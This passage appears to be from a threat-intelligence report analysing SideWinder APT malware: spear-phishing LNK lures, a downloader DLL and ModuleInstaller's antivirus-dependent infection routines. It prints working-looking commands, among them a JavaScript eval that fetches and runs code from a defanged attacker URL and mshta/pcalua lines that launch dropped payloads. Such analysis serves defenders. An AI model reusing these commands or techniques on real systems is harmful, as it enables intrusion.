style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div 
class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e1f542589114-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e1f542589114-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e1f542589114-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e1f542589114-1"><span class="crayon-i">javascript</span><span class="crayon-sy">:</span><span class="crayon-e">eval</span><span class="crayon-sy">(</span><span class="crayon-s">"v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\", </span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e1f542589114-2"><span class="crayon-s">\"hxxps://mofa-gov-</span></div><div class="crayon-line" id="crayon-67446d0bc5e1f542589114-3"><span class="crayon-s">sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()"</span><span class="crayon-sy">)</span></div></div></td> </tr> </table> </div> </div><p> <h3 id="initial-infection-lnk">Initial infection LNK</h3> <p>During the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file attached. The ZIP archive is distributed with names intended to trick the victim into opening the file. 
The attacker frequently uses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.</p> <p align="center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145646/SideWinder_2024_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114132" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145646/SideWinder_2024_06.png" alt="" width="105" height="149" /></a></p> <p>The archive usually contains an LNK file with the same name as the archive. For example:</p> <table width="100%"> <tbody> <tr> <td width="50%"><strong>ZIP filename</strong></td> <td width="50%"><strong>LNK filename</strong></td> </tr> <tr> <td>moavineen-e-hujjaj hajj-2024.zip</td> <td>MOAVINEEN-E-HUJJAJ HAJJ-2024.docx.lnk</td> </tr> <tr> <td>NIMA Invitation.zip</td> <td>NIMA Invitation.doc.lnk</td> </tr> <tr> <td>Special Envoy Speech at NCA.zip</td> <td>Special Envoy Speech at NCA.jpg .lnk</td> </tr> <tr> <td>දින සංශෝධන කර ගැනිම.zip (Amending dates)</td> <td>දින සංශෝධන කර ගැනිම .lnk</td> </tr> <tr> <td>offer letter.zip</td> <td>offer letter.docx.lnk</td> </tr> </tbody> </table> <p>The LNK file points to the &#8220;mshta.exe&#8221; utility, which is used to execute JavaScript code hosted on a malicious website controlled by the attacker.</p> <p>Below are the configuration values extracted from one of these LNK files:</p> <div id="crayon-67446d0bc5e28772762513" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px 
!important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Local Base Path : C:\Windows\System32\sshtw.png Description : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx Relative Path : ..\..\..\Windows\System32\calca.exe Link Target: C:\Windows\System32\mshta.exe Working Directory : C:\Windows\System32 Command Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0" Icon File Name : %systemroot%\System32\moricons.dll Machine ID : desktop-84bs21b</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e28772762513-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-2">2</div><div class="crayon-num" 
data-line="crayon-67446d0bc5e28772762513-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-4">4</div><div class="crayon-num" data-line="crayon-67446d0bc5e28772762513-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-6">6</div><div class="crayon-num" data-line="crayon-67446d0bc5e28772762513-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-8">8</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e28772762513-1"><span class="crayon-e">Local </span><span class="crayon-e">Base </span><span class="crayon-i">Path</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">sshtw</span><span class="crayon-sy">.</span><span class="crayon-e">png</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-2"><span class="crayon-i">Description</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">MOAVINEEN</span>-<span class="crayon-i">E</span>-<span class="crayon-e">HUJJAJ </span><span class="crayon-i">HAJJ</span>-<span class="crayon-cn">2024.docx</span></div><div class="crayon-line" id="crayon-67446d0bc5e28772762513-3"><span class="crayon-e">Relative </span><span class="crayon-i">Path</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span 
class="crayon-sy">\</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">\</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">calca</span><span class="crayon-sy">.</span><span class="crayon-e">exe</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-4"><span class="crayon-e">Link </span><span class="crayon-i">Target</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">mshta</span><span class="crayon-sy">.</span><span class="crayon-e">exe</span></div><div class="crayon-line" id="crayon-67446d0bc5e28772762513-5"><span class="crayon-e">Working </span><span class="crayon-i">Directory</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-e">System32</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-6"><span class="crayon-e">Command </span><span class="crayon-e">Line </span><span class="crayon-i">Arguments</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0"</span></div><div class="crayon-line" id="crayon-67446d0bc5e28772762513-7"><span class="crayon-e">Icon </span><span class="crayon-e">File </span><span 
class="crayon-i">Name</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">systemroot</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">moricons</span><span class="crayon-sy">.</span><span class="crayon-e">dll</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-8"><span class="crayon-e">Machine </span><span class="crayon-i">ID</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">desktop</span>-<span class="crayon-cn">84bs21b</span></div></div></td> </tr> </table> </div> </div><p> <h2 id="downloader-module">Downloader module</h2> <p>The RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is stored as a base64-encoded string. 
The payload is a .NET library named &#8220;App.dll&#8221;, which is then invoked by the script.</p> <div id="attachment_114133" style="width: 673px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114133" class="size-full wp-image-114133" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07.png" alt="JavaScript loader (beautified)" width="663" height="162" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07.png 663w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07-300x73.png 300w" sizes="(max-width: 663px) 100vw, 663px" /></a><p id="caption-attachment-114133" class="wp-caption-text">JavaScript loader (beautified)</p></div> <p>App.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an argument by the JavaScript, or to decode and execute another payload passed as an argument.</p> <p>The library should be executed by invoking the &#8220;Programs.Work()&#8221; method, which can receive three arguments as input. 
We named the inputs as follows:</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Argument</strong></td> <td width="70%"><strong>Argument description</strong></td> </tr> <tr> <td>C2_URL</td> <td>An optional argument that can be used to pass a URL from which a remote payload is downloaded.</td> </tr> <tr> <td>Payload_filename</td> <td>An optional argument that can be used together with the &#8220;Payload_data&#8221; argument to create a file on the local filesystem that will contain the dropped payload.</td> </tr> <tr> <td>Payload_data</td> <td>An optional argument that can be used to pass an encoded payload that should be dropped on the local filesystem.</td> </tr> </tbody> </table> <p>App.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions are of interest to the malware. The collected data are sent to the C2. Then, if the &#8220;Payload_data&#8221; argument is not &#8220;Null&#8221;, it decodes and decompresses the data using base64 and Gzip. 
The resulting payload is stored in the user&#8217;s Temp directory using the filename specified in the &#8220;Payload_filename&#8221; argument.</p> <p>If Avast or AVG solutions are installed, the content of the dropped file is executed with the following command:</p> <div id="crayon-67446d0bc5e2a695178061" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> mshta.exe "javascript:WshShell = new 
ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1, false);window.close()</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e2a695178061-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2a695178061-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e2a695178061-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e2a695178061-1"><span class="crayon-i">mshta</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span><span class="crayon-s">"javascript:WshShell = new </span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2a695178061-2"><span class="crayon-s">ActiveXObject("</span><span class="crayon-i">WScript</span><span class="crayon-sy">.</span><span class="crayon-i">Shell</span><span class="crayon-s">");WshShell.Run("</span><span class="crayon-sy">%</span><span class="crayon-i">TEMP</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">Payload_filename</span><span class="crayon-sy">%</span>"<span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-h"> </span></div><div class="crayon-line" id="crayon-67446d0bc5e2a695178061-3"><span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span><span class="crayon-i">window</span><span class="crayon-sy">.</span><span class="crayon-e">close</span><span 
class="crayon-sy">(</span><span class="crayon-sy">)</span></div></div></td> </tr> </table> </div> </div><p> Otherwise, it will be executed with the following command:</p> <div id="crayon-67446d0bc5e2c664845986" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> pcalua.exe -a %TEMP%\%Payload_filename%</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " 
data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e2c664845986-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e2c664845986-1"><span class="crayon-i">pcalua</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>-<span class="crayon-i">a</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">TEMP</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">Payload_filename</span><span class="crayon-sy">%</span></div></div></td> </tr> </table> </div> </div><p> If the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The obtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.</p> <p>The resulting file should be .NET malware named &#8220;ModuleInstaller.dll&#8221;.</p> <h2 id="moduleinstaller">ModuleInstaller</h2> <p>The ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised machines, a malicious component we dubbed &#8220;Backdoor loader module&#8221;. We have been observing this specific component since 2020, but previously we only described it in our private intelligence reports.</p> <p>ModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious library, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional modules, a malicious library, and an encrypted payload. 
We observed various combinations of the dropped files, the most common being:</p> <div id="crayon-67446d0bc5e2e400679548" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %Malware Directory%\vssvc.exe %Malware Directory%\%encryptedfile% %Malware Directory%\vsstrace.dll %Malware Directory%\vssvc.exe.config</textarea></div> <div class="crayon-main" 
style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2e400679548-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2e400679548-4">4</div><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2e400679548-6">6</div><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-7">7</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-1"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">vssvc</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2e400679548-2">&nbsp;</div><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-3"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">encryptedfile</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2e400679548-4">&nbsp;</div><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-5"><span 
class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">vsstrace</span><span class="crayon-sy">.</span><span class="crayon-i">dll</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2e400679548-6">&nbsp;</div><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-7"><span class="crayon-sy">%</span><span class="crayon-e">Malware </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">vssvc</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-sy">.</span><span class="crayon-i">config</span></div></div></td> </tr> </table> </div> </div><p> or</p> <div id="crayon-67446d0bc5e30052144267" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div 
class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %Malware Directory%\WorkFolders.exe %Malware Directory%\%encryptedfile% %Malware Directory%\propsys.dll %Malware Directory%\WorkFolders.exe.config</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e30052144267-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e30052144267-4">4</div><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e30052144267-6">6</div><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-7">7</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e30052144267-1"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span 
class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">WorkFolders</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e30052144267-2">&nbsp;</div><div class="crayon-line" id="crayon-67446d0bc5e30052144267-3"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">encryptedfile</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e30052144267-4">&nbsp;</div><div class="crayon-line" id="crayon-67446d0bc5e30052144267-5"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">propsys</span><span class="crayon-sy">.</span><span class="crayon-i">dll</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e30052144267-6">&nbsp;</div><div class="crayon-line" id="crayon-67446d0bc5e30052144267-7"><span class="crayon-sy">%</span><span class="crayon-e">Malware </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">WorkFolders</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-sy">.</span><span class="crayon-i">config</span></div></div></td> </tr> </table> </div> </div><p> ModuleInstaller embeds the following resources:</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Resource name</strong></td> <td width="40%"><strong>MD5</strong></td> <td width="35%"><strong>Description</strong></td> </tr> <tr> <td>Interop_TaskScheduler_x64</td> 
<td>95a49406abce52a25f0761f92166c18a</td> <td>Interop.TaskScheduler.dll for 64-bit systems used to create Windows Scheduled Tasks</td> </tr> <tr> <td>Interop_TaskScheduler_x86</td> <td>dfe750747517747afa2cee76f2a0f8e4</td> <td>Interop.TaskScheduler.dll for 32-bit systems used to create Windows Scheduled Tasks</td> </tr> <tr> <td>manifest</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest dropped as .config file</td> </tr> <tr> <td>PeLauncher</td> <td>22e3a5970ae84c5f68b98f3b19dd980b</td> <td>.NET program not used in the code</td> </tr> <tr> <td>shellcode</td> <td>32fc462f80b44013caeada725db5a2d1</td> <td>Shellcode used to load libraries, which exports a function named &#8220;Start&#8221;</td> </tr> <tr> <td>StealerBot_CppInstaller</td> <td>a107f27e7e9bac7c38e7778d661b78ac</td> <td>C++ library used to download two malicious libraries and create persistence points</td> </tr> </tbody> </table> <p>The downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The retrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security solutions:</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Pattern</strong></td> <td width="70%"><strong>Endpoint Security Solution</strong></td> </tr> <tr> <td>q=apn</td> <td>Unknown</td> </tr> <tr> <td>aspers</td> <td>Kaspersky</td> </tr> <tr> <td>Afree</td> <td>McAfee (misspelled)</td> </tr> <tr> <td>avast</td> <td>Avast</td> </tr> <tr> <td>avg</td> <td>AVG</td> </tr> <tr> <td>orton</td> <td>Norton</td> </tr> <tr> <td>360</td> <td>360 Total Security</td> </tr> <tr> <td>avir</td> <td>Avira</td> </tr> </tbody> </table> <p>ModuleInstaller supports six infection routines, which differ in the techniques used to execute &#8220;Backdoor loader module&#8221; or download the components, but share similarities in the main logic. Some of these routines also include tricks to remove evidence, while others don&#8217;t. 
The malware runs only one routine, chosen according to the value received as an argument and the value of an internal configuration embedded in the code.</p> <table width="100%"> <tbody> <tr> <td width="50%"><strong>Routine</strong></td> <td width="50%"><strong>Conditions</strong></td> </tr> <tr> <td>Infection Routine 1</td> <td>Executed when the substring &#8220;q=apn&#8221; is detected.</td> </tr> <tr> <td>Infection Routine 2</td> <td>Executed when a specific byte of the internal config is equal to &#8220;1&#8221;.</td> </tr> <tr> <td>Infection Routine 3</td> <td>Executed when the substring &#8220;360&#8221; is detected.</td> </tr> <tr> <td>Infection Routine 4</td> <td>Executed when the substring &#8220;avast&#8221; or &#8220;avir&#8221; is detected.</td> </tr> <tr> <td>Infection Routine 5</td> <td>Executed when the substring &#8220;aspers&#8221; or &#8220;Afree&#8221; is detected.</td> </tr> <tr> <td>Infection Routine 6</td> <td>Default case. Executed when none of the other conditions is satisfied.</td> </tr> </tbody> </table> <p>All the routines collect information about the compromised system. 
